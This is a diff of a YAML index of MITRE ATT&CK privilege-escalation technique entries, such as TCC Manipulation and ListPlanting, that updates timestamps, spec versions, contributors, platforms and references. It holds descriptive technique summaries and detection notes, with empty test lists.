@@ -21759,9 +22001,13 @@ privilege-escalation:
         events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
         most Linux and macOS systems, a list of file paths for valid shell options
         available on a system are located in the <code>/etc/shells</code> file.\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
       x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -21770,8 +22016,67 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+      created: '2020-01-24T14:13:45.936Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/004
+        external_id: T1546.004
+      - source_name: anomali-linux-rabbit
+        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+          Malware Out of a Hat. Retrieved December 17, 2020.
+        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+      - source_name: anomali-rocke-tactics
+        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+          December 17, 2020.
+        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+      - source_name: Linux manual bash invocation
+        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+        url: https://wiki.archlinux.org/index.php/Bash#Invocation
+      - source_name: ScriptingOSX zsh
+        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+          Files. Retrieved February 25, 2021.'
+        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+      - source_name: bencane blog bashrc
+        description: Benjamin Cane. (2013, September 16). Understanding a little more
+          about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+        url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+      - source_name: macOS MS office sandbox escape
+        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+          Retrieved August 20, 2021.
+        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+      - source_name: Magento
+        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+          Vector. Retrieved December 17, 2020.
+        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+      - source_name: Tsunami
+        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+      - source_name: PersistentJXA_leopitt
+        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+          for macOS. Retrieved January 11, 2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: code_persistence_zsh
+        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+          Retrieved January 11, 2021.
+        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+      - source_name: ESF_filemonitor
+        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+        url: https://objective-see.com/blog/blog_0x48.html
+      - source_name: intezer-kaiji-malware
+        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+          turning to Golang. Retrieved December 17, 2020.'
+        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.004
     atomic_tests: []
   T1134.005:
@@ -21817,7 +22122,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
           30, 2017.
         source_name: Microsoft DsAddSidHistory
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:49:58.414Z'
       name: 'Access Token Manipulation: SID-History Injection'
       description: |-
         Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -21842,13 +22147,11 @@ privilege-escalation:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1134.005
     atomic_tests: []
   T1548.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T16:35:18.492Z'
       name: Elevated Execution with Prompt
       description: "Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code>
         API to escalate privileges by prompting the user for credentials.(Citation:
@@ -21928,7 +22231,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.002:
     technique:
@@ -21964,7 +22266,7 @@ privilege-escalation:
         Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
 
         Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=&lt;target binary&gt;</code>. The binary will then be executed by the system when the authentication packages are loaded.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:29:36.291Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Authentication Package
       x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -21987,12 +22289,11 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.002
     atomic_tests: []
   T1546.015:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:34:29.402Z'
       name: 'Event Triggered Execution: Component Object Model Hijacking'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by hijacked references to Component Object Model (COM) objects.
@@ -22070,12 +22371,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.015
     atomic_tests: []
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -22136,7 +22436,6 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests: []
   T1037.005:
@@ -22180,7 +22479,7 @@ privilege-escalation:
         mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
         StartupItems run during the bootup phase of macOS, they will run as the elevated
         root user."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:43:21.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Startup Items'
       x_mitre_detection: |-
@@ -22202,7 +22501,6 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.005
     atomic_tests: []
   T1078.002:
@@ -22283,7 +22581,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.003:
     technique:
@@ -22306,7 +22603,7 @@ privilege-escalation:
         description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
           Active Directory Users and Computers in Windows Server 2008. Retrieved November
           15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:25.625Z'
       name: Network Logon Script
       description: "Adversaries may use network logon scripts automatically executed
         at logon initialization to establish persistence. Network logon scripts can
@@ -22336,12 +22633,10 @@ privilege-escalation:
       - 'File: File Modification'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:45.568Z'
       name: 'Event Triggered Execution: AppInit DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -22426,7 +22721,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.010
     atomic_tests: []
   T1546.002:
@@ -22491,7 +22785,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.002
     atomic_tests: []
   T1543.001:
@@ -22566,7 +22859,7 @@ privilege-escalation:
         benign software. Launch Agents are created with user level privileges and
         execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
         OceanLotus for OS X) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-21T16:13:00.598Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Create or Modify System Process: Launch Agent'
       x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -22594,7 +22887,6 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.001
     atomic_tests: []
   T1055.009:
@@ -22625,7 +22917,7 @@ privilege-escalation:
         url: http://man7.org/linux/man-pages/man1/dd.1.html
         description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
           February 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-20T22:25:55.331Z'
       name: Proc Memory
       description: "Adversaries may inject malicious code into processes via the /proc
         filesystem in order to evade process-based defenses as well as possibly elevate
@@ -22668,12 +22960,10 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.016:
     technique:
-      modified: '2024-04-12T02:23:44.583Z'
+      modified: '2024-04-28T15:52:44.332Z'
       name: Installer Packages
       description: |-
         Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -22690,7 +22980,7 @@ privilege-escalation:
         phase_name: persistence
       x_mitre_contributors:
       - Brandon Dalton @PartyD0lphin
-      - Alexander Rodchenko
+      - Rodchenko Aleksandr
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -22749,7 +23039,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.004:
     technique:
@@ -22831,12 +23120,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.004
     atomic_tests: []
   T1134:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.762Z'
       name: Access Token Manipulation
       description: |-
         Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -22933,7 +23221,6 @@ privilege-escalation:
         url: https://pentestlab.blog/2017/04/03/token-manipulation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1543.002:
     technique:
@@ -23047,7 +23334,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.002
     atomic_tests: []
   T1547.013:
@@ -23117,7 +23403,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.005:
     technique:
@@ -23145,7 +23430,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:24:54.198Z'
       name: Thread Local Storage
       description: "Adversaries may inject malicious code into processes via thread
         local storage (TLS) callbacks in order to evade process-based defenses as
@@ -23189,8 +23474,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1547.007:
     technique:
@@ -23226,7 +23509,7 @@ privilege-escalation:
         Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> within the <code>~/Library/Preferences/ByHost</code> directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
 
         Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the <code>com.apple.loginwindow.[UUID].plist</code> file to execute payloads when a user logs in.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T23:46:56.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: Re-opened Applications'
       x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -23245,12 +23528,11 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.007
     atomic_tests: []
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -23300,12 +23582,11 @@ privilege-escalation:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests: []
   T1098.002:
     technique:
-      modified: '2024-01-03T15:46:06.706Z'
+      modified: '2024-10-15T15:37:25.303Z'
       name: 'Account Manipulation: Additional Email Delegate Permissions'
       description: "Adversaries may grant additional permission levels to maintain
         persistent access to an adversary-controlled email account. \n\nFor example,
@@ -23338,9 +23619,10 @@ privilege-escalation:
       x_mitre_contributors:
       - Microsoft Detection and Response Team (DART)
       - Mike Burns, Mandiant
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
       - Arad Inbar, Fidelis Security
+      - Nilesh Dherange (Gurucul)
+      - Naveen Vijayaraghavan
       x_mitre_deprecated: false
       x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
         permissions changes that may indicate excessively broad permissions being
@@ -23357,9 +23639,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Group: Group Modification'
       - 'Application Log: Application Log Content'
@@ -23405,38 +23686,19 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.002
     atomic_tests: []
   T1548.006:
     technique:
-      modified: '2024-04-17T00:02:12.021Z'
+      modified: '2024-10-16T16:54:56.714Z'
       name: TCC Manipulation
-      description: "Adversaries can manipulate or abuse the Transparency, Consent,
-        & Control (TCC) service or database to execute malicious applications with
-        elevated permissions. TCC is a Privacy & Security macOS control mechanism
-        used to determine if the running process has permission to access the data
-        or services protected by TCC, such as screen sharing, camera, microphone,
-        or Full Disk Access (FDA).\n\nWhen an application requests to access data
-        or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
-        located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
-        for existing permissions. If permissions do not exist, then the user is prompted
-        to grant permission. Once permissions are granted, the database stores the
-        application's permissions and will not prompt the user again unless reset.
-        For example, when a web browser requests permissions to the user's webcam,
-        once granted the web browser may not explicitly prompt the user again.(Citation:
-        welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
-        abuse the TCC service to execute malicious content. This can be done in various
-        ways, including using privileged system applications to execute malicious
-        payloads or manipulating the database to grant their application TCC permissions.
-        \n\nFor example, adversaries can use Finder, which has FDA permissions by
-        default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
-        while preventing a user prompt. For a system without System Integrity Protection
-        (SIP) enabled, adversaries have also manipulated the operating system to load
-        an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
-        TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
-        inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
-        into targeted applications with the desired TCC permissions.\n"
+      description: |+
+        Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+        When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+        Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -23444,6 +23706,8 @@ privilege-escalation:
         phase_name: privilege-escalation
       x_mitre_contributors:
       - Marina Liang
+      - Wojciech Reguła @_r3ggi
+      - Csaba Fitzl @theevilbit of Kandji
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -23451,7 +23715,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - macOS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Modification'
@@ -23481,7 +23745,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.008:
     technique:
@@ -23527,7 +23790,7 @@ privilege-escalation:
         description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
           Retrieved December 20, 2017.
         source_name: Chokepoint preload rootkits
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:26:31.766Z'
       name: Ptrace System Calls
       description: "Adversaries may inject malicious code into processes via ptrace
         (process trace) system calls in order to evade process-based defenses as well
@@ -23572,8 +23835,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1037.001:
     technique:
@@ -23599,7 +23860,7 @@ privilege-escalation:
         url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
         description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
           18. Retrieved November 15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:03.153Z'
       name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
       description: "Adversaries may use Windows logon scripts automatically executed
         at logon initialization to establish persistence. Windows allows logon scripts
@@ -23625,59 +23886,28 @@ privilege-escalation:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1037.001
     atomic_tests: []
   T1055.015:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
-      type: attack-pattern
-      created: '2021-11-22T15:02:15.190Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1055.015
-        url: https://attack.mitre.org/techniques/T1055/015
-      - source_name: Microsoft List View Controls
-        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
-        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
-          January 4, 2022.
-      - source_name: Modexp Windows Process Injection
-        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
-        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
-          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
-          Retrieved November 15, 2021.'
-      - source_name: ESET InvisiMole June 2020
-        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
-        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
-          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-14T17:34:33.948Z'
       name: 'Process Injection: ListPlanting'
       description: "Adversaries may abuse list-view controls to inject malicious code
         into hijacked processes in order to evade process-based defenses as well as
         possibly elevate privileges. ListPlanting is a method of executing arbitrary
-        code in the address space of a separate live process. Code executed via ListPlanting
-        may also evade detection from security products since the execution is masked
-        under a legitimate process.\n\nList-view controls are user interface windows
-        used to display collections of items.(Citation: Microsoft List View Controls)
-        Information about an application's list-view settings are stored within the
-        process' memory in a <code>SysListView32</code> control.\n\nListPlanting (a
-        form of message-passing \"shatter attack\") may be performed by copying code
-        into the virtual address space of a process that uses a list-view control
-        then using that code as a custom callback for sorting the listed items.(Citation:
-        Modexp Windows Process Injection) Adversaries must first copy code into the
-        target process’ memory space, which can be performed various ways including
-        by directly obtaining a handle to the <code>SysListView32</code> child of
-        the victim process window (via Windows API calls such as <code>FindWindow</code>
+        code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+        Code executed via ListPlanting may also evade detection from security products
+        since the execution is masked under a legitimate process.\n\nList-view controls
+        are user interface windows used to display collections of items.(Citation:
+        Microsoft List View Controls) Information about an application's list-view
+        settings are stored within the process' memory in a <code>SysListView32</code>
+        control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+        be performed by copying code into the virtual address space of a process that
+        uses a list-view control then using that code as a custom callback for sorting
+        the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+        must first copy code into the target process’ memory space, which can be performed
+        various ways including by directly obtaining a handle to the <code>SysListView32</code>
+        child of the victim process window (via Windows API calls such as <code>FindWindow</code>
         and/or <code>EnumWindows</code>) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
         methods.\n\nSome variations of ListPlanting may allocate memory in the target
         process but then use window messages to copy the payload, to avoid the use
@@ -23694,6 +23924,9 @@ privilege-escalation:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - ESET
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitoring Windows API calls indicative of the various types
         of code injection may generate a significant amount of data and may not be
         directly useful for defense unless collected under specific circumstances
@@ -23708,21 +23941,52 @@ privilege-escalation:
         arguments.\n\nAnalyze process behavior to determine if a process is performing
         unusual actions, such as opening network connections, reading files, or other
         suspicious actions that could relate to post-compromise behavior. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Modification'
       - 'Process: OS API Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+      created: '2021-11-22T15:02:15.190Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1055/015
+        external_id: T1055.015
+      - source_name: Hexacorn Listplanting
+        description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+          trick. Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+      - source_name: ESET InvisiMole June 2020
+        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+      - source_name: Microsoft List View Controls
+        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+          January 4, 2022.
+        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
